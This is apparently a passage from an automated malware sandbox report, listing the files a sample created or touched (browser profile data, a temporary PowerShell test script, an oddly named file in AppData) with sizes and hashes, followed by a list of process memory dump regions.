C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
293B

MD5
f6f40be9a2d0963195af307a28cc7bf8

SHA1
fa3ff625b8070d68d843b818b74315fda613b95d

SHA256
e10ab19392ba425b3e6632cd53faa32e51ade4cb16564200ac75680bb195612e

SHA512
9b444d7691e190fa86d055d42aa5331ec76d0ce1ee0852854f714f27de8ac2b700735c0a84b921cb858d7b6a1ab2e71e012215ffef710da6fb5589e51bd46932

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
269B

MD5
440d1f3a8241ac936f2421c41406fbd3

SHA1
e39d100ba9594302e895900e7b202b11a91952d1

SHA256
6084a765c8aca373e4dd49f1891f7a0e3980c82311965baaa8f5eb0b9b14862a

SHA512
d4f400a2943be824965c4985b82149de87ad64b1cdf1f3f1f05fdd592fa362990e27f30a13b1c590152c008a8a4e718132146544ac1963a792f3eebd5fc93d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
18f41d3abbeccbac6b0b6677dee49601

SHA1
db3087a70fe96922450a0d80c2a2ab07234e29ac

SHA256
566c66f24265570b5c21512e21cec367f20848e16a4ac6603a48359b88ded323

SHA512
99080a5a660158028154b6e2f71a34fbbcdcf24f0cd26877c16b169094347041f80995bfdc69121db32192fc8d7abc6680e71aba85b264a000b0c0f47f3cbc45

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
a9f1dc1fbdd3030a8600955812b290ee

SHA1
726853b48880e8e7c287e4d7a9ffbe6c3a82e345

SHA256
1736aa60ee0d8a9acd4552c20dacafdf6f7743a4a25d0b3c07a56606c3aae217

SHA512
b083b6bacc35d12c5af28a985d228fd93d82ad65a8964ce3de664460697911b2b3cdd0f6f7b70dbab3cad200cff4a82f45df9761b04e2824d575cf3e16788ab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
4cc3a09f304520bfda641ed0421c1df8

SHA1
206b6c398323448ca5dc2a0a0cbec53e9db55c0c

SHA256
8f7121769321866c73080e3efc773200c17a5bdc900e848805f6330966fe51c3

SHA512
73cc2f8ec2bb5f665ef203cfbd8ecd643afecd708fb888fcb56c6fa39ace581de148acaab3541fd975b97614a96011e828293f6699bdd2fa1184d416a42df5a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
263B

MD5
07425a14d6146a29ffbd4634a051bb40

SHA1
74203a8d3c822cce6e5d7665d740efeb4b10495d

SHA256
1a39ad5742d8643b597c9f4c81e8e8996b569ee3275a95de0fcb3de50615a81a

SHA512
ed430d477d8dda8c774fab3133f61c3eb55950ba49e8ff121f77dbc456d06a4bbe1a1ba2df3e0f8e6977a729307e17e74d90cd206654794058aae86080219dc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
e21fe897bd707329692f225e2066aac5

SHA1
2ce1db27931ef531e4e57fd58184c3e2cf4744c4

SHA256
38df9f85bed09417b569ccee623ec33d29363f9caf636e837f929ecb9d36ab31

SHA512
56adc530e0259429b7295382f1b6066b91d7a65eab7410c359873164213a53df916b93dfcdcb127820b65ff0e5db86287b1ee1f00872c42241086e9f0a2a695a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
281B

MD5
4fd865a3912433abf18dfd6d87fd4a54

SHA1
1cde2bf6236985a892e13ab97e7d19a615bcd6ea

SHA256
d5c8a962ef370efbbcf607df5d06b73413aebda8922d96eec436f9c05afe40e4

SHA512
da616b2f4766868493f74cbcab64e9665b48e72727f92f5fb1bbd8d844c63f5f1d22e7cb1c1123d7918c6658ea9af2e71e8ad652cf8a55fab1cd6e3dfb4d2071

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
8KB

MD5
f868500d8ac389a6980704c14b9b4676

SHA1
6c5366013fa1c5ca6d3c0c29a58662b6d422a365

SHA256
c7bbf2f6cec7c19627c404c270e68cf9a8bbb2b0dfad08f03297b54219321287

SHA512
f2265defd64a640590ae944df1bd7321dae47a40d85b9ba9b5419276ad413be4351fb0fefa8bbd71b55cd2a347195e20392e089982d3340f55c27347abd658ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
116KB

MD5
dacebdfe9a2f9b30e4dfcc2458a8b4c9

SHA1
af4bbacfae49fb7c606cb9910dabbbd81a7a8177

SHA256
dd436e441dd0b9f35ee459d1c8a03788925c1f6bdf20d43216d4f8e07f4fd3bd

SHA512
64f1a9e18cd5c14234453575f2d2e3e56705341d818f4d29538212a21b6e3defddc6a9fca5b9b4185ced22632e77644a15667021d899f9a84c2da5fa26c76c11

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkfkvsso.hsz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mkvdxetrpqimuhjyvplyprghf

Filesize
4KB

MD5
7aca43b2800ceb18b3ed2326532545de

SHA1
d4cf207ef85bd749d59c1cb27a09c167ee21523a

SHA256
3d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480

SHA512
0e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f

Download Submit
C:\Users\Admin\AppData\Roaming\mandolin.Udr

Filesize
440KB

MD5
cc70b6c33ca1916df2146cd72741752a

SHA1
05bbef8b94d2318f8632552fb91d808b24a0b538

SHA256
d25c576fee8fb82fee627af91c3c80c1360b22f87de1ef3d3efd4be314d109e0

SHA512
eed050f07a8fd96a271288447a0c1d5564caa1815a55bcb2b1c0a0db8605b55300a9a8c55fd6bc1d787736ec1b1bd72ef96e9baf73185f22ed2716404e4fa80a

Download Submit
memory/1388-21-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

Filesize
10.8MB

Download
memory/1388-19-0x00007FF9DB8B3000-0x00007FF9DB8B5000-memory.dmp

Filesize
8KB

Download
memory/1388-10-0x000001F36DCC0000-0x000001F36DCE2000-memory.dmp

Filesize
136KB

Download
memory/1388-15-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

Filesize
10.8MB

Download
memory/1388-16-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

Filesize
10.8MB

Download
memory/1388-4-0x00007FF9DB8B3000-0x00007FF9DB8B5000-memory.dmp

Filesize
8KB

Download
memory/1388-24-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

Filesize
10.8MB

Download
memory/1388-20-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

Filesize
10.8MB

Download
memory/2532-112-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2532-110-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2532-108-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2532-105-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3376-121-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3376-122-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3376-120-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3708-192-0x00000000246F0000-0x0000000024709000-memory.dmp

Filesize
100KB

Download
memory/3708-189-0x00000000246F0000-0x0000000024709000-memory.dmp

Filesize
100KB

Download
memory/3708-73-0x0000000023BC0000-0x0000000023BF4000-memory.dmp

Filesize
208KB

Download
memory/3708-72-0x0000000023BC0000-0x0000000023BF4000-memory.dmp

Filesize
208KB

Download
memory/3708-69-0x0000000023BC0000-0x0000000023BF4000-memory.dmp

Filesize
208KB

Download
memory/3708-64-0x00000000012D0000-0x0000000002524000-memory.dmp

Filesize
18.3MB

Download
memory/3708-63-0x00000000012D0000-0x0000000002524000-memory.dmp

Filesize
18.3MB

Download
memory/3708-193-0x00000000246F0000-0x0000000024709000-memory.dmp

Filesize
100KB

Download
memory/4696-106-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4696-107-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4696-111-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4848-49-0x0000000009240000-0x000000000EA49000-memory.dmp

Filesize
88.0MB

Download
memory/4848-47-0x0000000008C90000-0x0000000009234000-memory.dmp

Filesize
5.6MB

Download
memory/4848-46-0x0000000007A30000-0x0000000007A52000-memory.dmp

Filesize
136KB

Download
memory/4848-45-0x0000000007AD0000-0x0000000007B66000-memory.dmp

Filesize
600KB

Download
memory/4848-44-0x0000000006DD0000-0x0000000006DEA000-memory.dmp

Filesize
104KB

Download
memory/4848-43-0x0000000008060000-0x00000000086DA000-memory.dmp

Filesize
6.5MB

Download
memory/4848-42-0x00000000068B0000-0x00000000068FC000-memory.dmp

Filesize
304KB

Download
memory/4848-41-0x0000000006810000-0x000000000682E000-memory.dmp

Filesize
120KB

Download
memory/4848-39-0x0000000006240000-0x0000000006594000-memory.dmp

Filesize
3.3MB

Download
memory/4848-28-0x00000000059E0000-0x0000000005A46000-memory.dmp

Filesize
408KB

Download
memory/4848-29-0x0000000006110000-0x0000000006176000-memory.dmp

Filesize
408KB

Download
memory/4848-27-0x0000000005940000-0x0000000005962000-memory.dmp

Filesize
136KB

Download
memory/4848-26-0x0000000005A70000-0x0000000006098000-memory.dmp

Filesize
6.2MB

Download
memory/4848-25-0x0000000002EE0000-0x0000000002F16000-memory.dmp

Filesize
216KB

Download